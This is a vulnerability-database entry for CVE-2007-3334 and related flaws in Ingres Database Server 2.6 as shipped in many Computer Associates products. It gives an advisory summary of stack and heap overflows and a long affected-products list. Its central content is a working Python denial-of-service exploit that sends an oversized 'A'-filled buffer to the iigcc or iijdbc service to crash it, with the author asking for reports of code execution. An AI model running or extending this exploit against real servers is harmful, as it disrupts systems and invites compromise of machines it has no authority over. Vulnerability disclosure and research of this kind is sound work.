ID
VAR-E-200706-0107
CVE
cve_id: | CVE-2007-3334 | Trust: 2.4 |
cve_id: | CVE-2007-3338 | Trust: 0.8 |
cve_id: | CVE-2007-3337 | Trust: 0.8 |
cve_id: | CVE-2007-3336 | Trust: 0.8 |
EDB ID
30224
TITLE
Ingress Database Server 2.6 - Multiple Remote Vulnerabilities - Windows dos Exploit
Trust: 0.6
DESCRIPTION
Ingress Database Server 2.6 - Multiple Remote Vulnerabilities. CVE-2007-3334CVE-37487 . dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | ingress | model: | database server | scope: | eq | version: | 2.6 | Trust: 1.6 |
vendor: | computer | model: | associates advantage ingres | scope: | eq | version: | 2.6 | Trust: 0.5 |
vendor: | ingres | model: | database | scope: | eq | version: | 20060 | Trust: 0.3 |
vendor: | ingres | model: | database | scope: | eq | version: | 3.0.3 | Trust: 0.3 |
vendor: | ingres | model: | database | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | ingres | model: | database | scope: | eq | version: | 2.5 | Trust: 0.3 |
vendor: | computer | model: | associates wily soa manager | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter workload control center 1.0.sp4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | computer | model: | associates unicenter workload control center sp4 | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter tng | scope: | eq | version: | 2.4.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter tng | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter tng 2.4.2j | scope: | - | version: | - | Trust: 0.3 |
vendor: | computer | model: | associates unicenter software delivery | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk sp1 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk sp3 | scope: | eq | version: | 5.5 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter serviceplus service desk | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service metric analysis | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service intelligence | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service delivery | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service delivery | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service catalog | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service assure | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service assure | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter service assure | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter remote control | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter remote control | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter patch management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter network and systems management | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter network and systems management | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter network and systems management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter management portal | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter lightweight portal | scope: | eq | version: | 2 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter job management option | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter enterprise job manager sp4 | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter enterprise job manager sp3 | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter desktop management suite | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter desktop and server management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter database command center | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter ca web services distributed management | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter ca web services distributed management | scope: | eq | version: | 3.11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset portfolio management | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset portfolio management | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset portfolio management | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter asset intelligence | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates unicenter advanced systems management | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates etrust web access control | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | computer | model: | associates etrust single sign-on | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust single sign-on | scope: | eq | version: | 8 | Trust: 0.3 |
vendor: | computer | model: | associates etrust single sign-on | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | computer | model: | associates etrust secure content manager | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | computer | model: | associates etrust network forensics | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust identity manager | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust iam toolkit | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust iam toolkit | scope: | eq | version: | 8 | Trust: 0.3 |
vendor: | computer | model: | associates etrust iam suite | scope: | eq | version: | 8 | Trust: 0.3 |
vendor: | computer | model: | associates etrust directory | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust audit r8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin sp2 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates etrust admin sp1 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | computer | model: | associates docserver | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | computer | model: | associates cleverpath predictive analysis server | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | computer | model: | associates cleverpath aion bre | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | computer | model: | associates cleverpath aion bpm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | computer | model: | associates ccs | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor storage resource manager | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor storage command center | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for tru64 | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for solaris | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for hp | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor enterprise backup for aix | scope: | eq | version: | 10.5 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup for linux | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup for linux | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | computer | model: | associates brightstor arcserve backup | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates arcserve backup for laptops and desktops | scope: | eq | version: | 11.5 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion harvest change manager | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion harvest change manager | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench | scope: | eq | version: | 7 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench sp1 | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | computer | model: | associates allfusion enterprise workbench | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | computer | model: | associates advantage data transformer | scope: | eq | version: | 2.2 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/24585/info
Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
print service + " crashed"
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Remote Vulnerabilities
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | vulnerability | Trust: 0.5 |
CREDITS
anonymous
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2007-3334 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 30224 | Trust: 1.9 |
db: | BID | id: | 24585 | Trust: 1.9 |
db: | NVD | id: | CVE-2007-3338 | Trust: 0.8 |
db: | NVD | id: | CVE-2007-3337 | Trust: 0.8 |
db: | NVD | id: | CVE-2007-3336 | Trust: 0.8 |
db: | EDBNET | id: | 51927 | Trust: 0.6 |
db: | PACKETSTORM | id: | 92818 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3334 | Trust: 2.1 |
url: | https://www.securityfocus.com/bid/24585/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/30224/ | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3336 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3338 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-3337 | Trust: 0.5 |
url: | http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/ | Trust: 0.3 |
url: | http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp | Trust: 0.3 |
url: | http://www.ingres.com/ | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/30224 | Trust: 0.3 |
url: | http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 | Trust: 0.3 |
url: | http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 | Trust: 0.3 |
SOURCES
db: | BID | id: | 24585 |
db: | PACKETSTORM | id: | 92818 |
db: | EXPLOIT-DB | id: | 30224 |
db: | EDBNET | id: | 51927 |
LAST UPDATE DATE
2022-07-27T09:48:33.447000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 24585 | date: | 2015-03-19T08:36:00 |
SOURCES RELEASE DATE
db: | BID | id: | 24585 | date: | 2007-06-21T00:00:00 |
db: | PACKETSTORM | id: | 92818 | date: | 2010-08-17T01:35:50 |
db: | EXPLOIT-DB | id: | 30224 | date: | 2007-06-21T00:00:00 |
db: | EDBNET | id: | 51927 | date: | 2007-06-21T00:00:00 |